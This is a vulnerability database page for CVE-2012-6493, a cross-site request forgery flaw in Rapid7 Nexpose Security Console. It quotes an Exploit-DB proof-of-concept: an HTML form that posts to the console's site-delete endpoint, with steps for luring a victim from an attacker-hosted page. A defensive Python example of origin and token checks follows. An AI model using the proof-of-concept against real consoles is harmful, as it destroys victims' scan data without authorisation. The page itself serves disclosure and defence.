CVE-2012-6493

Severity: medium
Published 2014-02-04 · Modified 2026-04-29
VIR risk: 7.8

Description

Cross-site request forgery (CSRF) vulnerability in Rapid7 Nexpose Security Console before 5.5.4 allows remote attackers to hijack the authentication of unspecified victims for requests that delete scan data and sites via a request to data/site/delete.

Predictions

Exploit likelihood: 20%
Patch ETA: (none listed)

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-23924 · webapps · multiple · verified · text · 2 KB
Robert Gilbert · 2013-01-06

Nexpose Security Console - Cross-Site Request Forgery

Source: Exploit-DB
Product: Nexpose Security Console
Vendor: Rapid7
Version: < 5.5.3
Tested Version: 5.5.1
Vendor Notified Date: December 19, 2012
Release Date: January 2, 2013
Risk: High
Authentication: None required
Remote: Yes

Description:
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose Security Console 5.5.3 and below allow remote attackers to submit actions on a legitimate user's behalf.

By not properly checking each URL, an attacker can execute requests on behalf of a legitimate user. If an authenticated user is tricked into visiting a specially crafted page, it may be possible to perform user-initiated actions on the web application using the victim's established session.

Successful exploitation of this vulnerability resulted in deleting scan data and sites during the proof-of-concept.

Exploit steps for proof-of-concept:
1. Create an external site/page http://attackersite.com/nexpose-csrf.htm that contains:
[code]
<html>
  <!-- Nexpose CSRF PoC -->
  <body>
    <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"
          method="POST" enctype="multipart/form-data">
      <input type="submit" value="delete site" />
    </form>
    <script>
      //document.forms[0].submit(); //uncomment to auto-submit
    </script>
  </body>
</html>
[/code]
2. Lure victim to http://attackersite.com/nexpose-csrf.htm.
3. Site with ID 1 is deleted when form is submitted.

Vendor Notified: Yes
Vendor Response: Quickly escalated and resolved.
Vendor Update: Remediated in 5.5.4.

Reference:
CVE-2012-6493
https://community.rapid7.com/docs/DOC-2065#release5
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Credit:
Robert Gilbert
HALOCK Security Labs
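The advisory above shows the failure mode: the console acted on a POST to data/site/delete because the browser attached the victim's session cookie, and nothing tied the request to a page the console itself had served. The following is an added example, not Rapid7 code and not part of the Exploit-DB entry, of the server-side check that closes this class of bug (CWE-352): a source-origin check followed by a per-session synchronizer token, failing closed when neither can be verified. The Request class, CONSOLE_ORIGIN (taken from the PoC URL), the session cookie value and the sample requests are all constructed for the example.

```python
"""CSRF request validation (illustrative example, not Rapid7 code).

Two independent layers a server can apply before acting on a state-changing
request such as the PoC's POST to data/site/delete: a source-origin check and
a per-session synchronizer token. Names and sample requests are constructed.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Origin the console is served from (assumed; taken from the PoC's form action).
CONSOLE_ORIGIN = "https://nexpose-security-console-site:3780"

STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


@dataclass
class Request:
    """Minimal stand-in for a framework request object (constructed)."""
    method: str
    path: str
    headers: dict
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)

    def header(self, name):
        # HTTP header names are case-insensitive.
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return None


def issue_csrf_token(session):
    """Mint a random token, keep it in the server-side session, and return it
    so the page template can embed it in every state-changing form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_of(url):
    """Reduce a URL to scheme://host[:port]; None if it is not an absolute URL
    (this also covers the literal 'null' Origin sent from an opaque origin)."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(req, console_origin=CONSOLE_ORIGIN):
    """Return (allowed, reason). Fails closed: a request the server cannot
    positively attribute to its own pages is refused."""
    if req.method.upper() not in STATE_CHANGING_METHODS:
        return True, "safe method"

    # Layer 1: source origin. Browsers attach Origin to cross-site form POSTs
    # (multipart/form-data included, so that enctype gains an attacker nothing
    # here); fall back to Referer, and refuse if both are absent.
    source = req.header("Origin") or req.header("Referer")
    if source is None:
        return False, "no Origin or Referer header"
    if _origin_of(source) != console_origin.lower():
        return False, f"cross-origin request from {source}"

    # Layer 2: synchronizer token. A cross-site page cannot read the victim's
    # session token, so it cannot forge this field. Compare in constant time.
    expected = req.session.get("csrf_token")
    supplied = req.form.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo():
    """Run the check over constructed requests; returns {name: allowed}."""
    session = {}                                # the victim's authenticated session
    token = issue_csrf_token(session)
    cookie = {"Cookie": "JSESSIONID=victim"}   # constructed; the browser sends it in every case
    delete = "/data/site/delete?siteid=1"

    cases = {
        # What the PoC page produces: session cookie present, attacker's Origin.
        "poc_cross_site": Request("POST", delete, {**cookie, "Origin": "http://attackersite.com"}, {}, session),
        # Same request with both source headers suppressed.
        "no_origin": Request("POST", delete, dict(cookie), {}, session),
        # Legitimate console form: own origin plus the session's token.
        "legit": Request("POST", delete, {**cookie, "Origin": CONSOLE_ORIGIN}, {"csrf_token": token}, session),
        # Same origin but no token, as on the unpatched endpoint.
        "same_origin_no_token": Request("POST", delete, {**cookie, "Origin": CONSOLE_ORIGIN}, {}, session),
        # Read-only request; CSRF protection must not block it.
        "get_view": Request("GET", "/data/site/list", dict(cookie), {}, session),
    }
    return {name: csrf_check(req)[0] for name, req in cases.items()}


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:22s} {'ALLOW' if allowed else 'REJECT'}")
```

Only the "legit" and "get_view" requests pass. The two layers are deliberately independent: the origin check catches the PoC as written, and the token check still holds if a proxy strips Origin and Referer. A SameSite=Lax or Strict attribute on the session cookie adds a third, browser-enforced layer, but does not replace the server-side check for clients that do not honour it.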

Application impact

Vendor   Product   Versions                                   Fixed
rapid7   nexpose   <= 5.5.3 (endIncluding 5.5.3)              (not listed)
rapid7   nexpose   5.4, 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.4.5,     (not listed)
                   5.4.6, 5.4.7, 5.4.8, 5.4.9, 5.4.10, 5.4.11,
                   5.4.12, 5.5.1

CWEs

CWE-352 (Cross-Site Request Forgery)
